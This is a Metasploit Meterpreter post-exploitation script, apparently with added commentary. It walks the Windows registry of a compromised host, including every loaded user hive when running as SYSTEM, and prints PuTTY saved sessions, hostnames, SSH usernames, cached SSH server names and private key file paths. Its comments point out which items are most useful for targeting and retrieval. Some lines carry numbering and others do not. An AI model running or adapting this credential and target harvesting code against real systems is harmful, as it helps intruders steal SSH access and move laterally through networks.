  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #
  7. # Meterpreter script for enumerating putty connections
  8. # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
  9. #
# Handle to the current Meterpreter session; the helpers below use it for
# registry and sysinfo calls.
@client = client

# Command-line options for this script (only a help flag is supported).
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)

opts.parse(args) do |opt, _idx, _val|
  next unless opt == "-h"
  print_line "Meterpreter Script for enumerating Putty Configuration."
  print_line(opts.usage)
  raise Rex::Script::Completed
end
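# Returns the registry roots under which per-user PuTTY settings live.
#
# As a normal user only the caller's own hive ("HKCU") is returned. When the
# session runs as SYSTEM, HKCU would be SYSTEM's own hive (no PuTTY data), so
# instead every loaded user hive under HKU whose name is a domain/local
# account SID (S-1-5-21-...) is returned. Only hives that are currently
# loaded (logged-on users, or profiles loaded by a service) are visible this
# way; users who are not logged on will not be enumerated. The anchored
# pattern also excludes the "<SID>_Classes" sub-hives.
#
# @return [Array<String>] registry key prefixes, e.g. ["HKCU"] or
#   ["HKU\\S-1-5-21-..."]; empty when running as SYSTEM with no user hive loaded
def hkcu_base
  return ["HKCU"] unless is_system?

  root_key, base_key = @client.sys.registry.splitkey("HKU\\")
  open_key = @client.sys.registry.open_key(root_key, base_key)
  begin
    # \d+ and \A/\z: a real SID has non-empty numeric sub-authorities and key
    # names contain no newlines, so this is strictly tighter than the old
    # unanchored \d* pattern without excluding any real hive.
    user_sids = open_key.enum_key.select { |k| k =~ /\AS-1-5-21-\d+-\d+-\d+-\d+\z/ }
  ensure
    # The original leaked the registry handle on the target.
    open_key.close
  end
  user_sids.map { |sid| "HKU\\#{sid}" }
end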
  40. def check_putty(reg_key_base)
  41. installed = false
  42. app_list = []
  43. app_list = registry_enumkeys("#{reg_key_base}\\Software")
  44. os = @client.sys.config.sysinfo['OS']
  45. if os =~ /(Windows 7|2008|Vista)/
  46. username_profile = registry_getvaldata("#{reg_key_base}\\Volatile Environment","USERNAME")
  47. elsif os =~ /(2000|NET|XP)/
  48. appdata_var = registry_getvaldata("#{reg_key_base}\\Volatile Environment","APPDATA")
  49. username_profile = appdata_var.scan(/^\w\:\D*\\(\D*)\\\D*$/)
  50. end
  51. if app_list.index("SimonTatham")
  52. print_status("Putty Installed for #{username_profile}")
  53. installed = true
  54. end
  55. return installed
  56. end
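# Lists the SSH servers whose host keys PuTTY has cached for this user.
#
# Only the value *names* under SshHostKeys are printed, not the key data; in
# PuTTY's layout each name encodes the key type, port and host, so the list
# is effectively a history of SSH servers the user has connected to and
# trusted -- the part that matters for targeting, not the key material.
#
# @param reg_key_base [String] registry prefix, "HKCU" or "HKU\\<SID>"
# @return [void]
def enum_known_ssh_hosts(reg_key_base)
  print_status("Saved SSH Server Public Keys:")
  # registry_enumvals returns nil when the key is absent (PuTTY configured but
  # never used for SSH); the original raised NoMethodError on nil.each here.
  hosts = Array(registry_enumvals("#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\SshHostKeys"))
  hosts.each { |host| print_status("\t#{host}") }
end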
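# Prints every saved PuTTY session under +reg_key_base+ with the connection
# details an operator would reuse.
#
# SSH sessions yield host, user name and key-file path; serial sessions yield
# the port parameters. Any other protocol (telnet, rlogin, raw, ...) still
# reveals a target host, so it is printed with its raw Protocol value instead
# of being silently skipped as the original did.
#
# @param reg_key_base [String] registry prefix, "HKCU" or "HKU\\<SID>"
# @return [void]
def enum_saved_sessions(reg_key_base)
  sessions_key = "#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\Sessions"
  # nil when the Sessions key does not exist (PuTTY present, nothing saved);
  # the original raised on nil.length.
  saved_sessions = Array(registry_enumkeys(sessions_key))

  saved_sessions.each do |saved_session|
    session_key = "#{sessions_key}\\#{saved_session}"
    value = ->(name) { registry_getvaldata(session_key, name) }

    print_status("Session #{saved_session}:")
    protocol = value.call("Protocol")
    case protocol
    when /ssh/
      print_status("\tProtocol: SSH")
      print_status("\tHostname: #{value.call("HostName")}")
      print_status("\tUsername: #{value.call("UserName")}")
      # Despite the value name, PuTTY stores the path of the *private* key
      # file (.ppk) used for authentication under "PublicKeyFile"; when set,
      # that file is the high-value item to retrieve from the target.
      print_status("\tPublic Key: #{value.call("PublicKeyFile")}")
    when /serial/
      print_status("\tProtocol: Serial")
      print_status("\tSerial Port: #{value.call("SerialLine")}")
      print_status("\tSpeed: #{value.call("SerialSpeed")}")
      print_status("\tData Bits: #{value.call("SerialDataBits")}")
      print_status("\tFlow Control: #{value.call("SerialFlowControl")}")
    else
      # telnet/rlogin/raw (or a missing Protocol value): still report where
      # the session points, since cleartext protocols are of interest too.
      print_status("\tProtocol: #{protocol}")
      print_status("\tHostname: #{value.call("HostName")}")
    end
  end
end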
# Entry point: only Windows Meterpreter sessions have a registry to read.
unless client.platform == 'windows'
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end

# Walk every user hive we can see and dump PuTTY data where it is configured.
hkcu_base.each do |hkb|
  next unless check_putty(hkb)
  enum_known_ssh_hosts(hkb)
  enum_saved_sessions(hkb)
end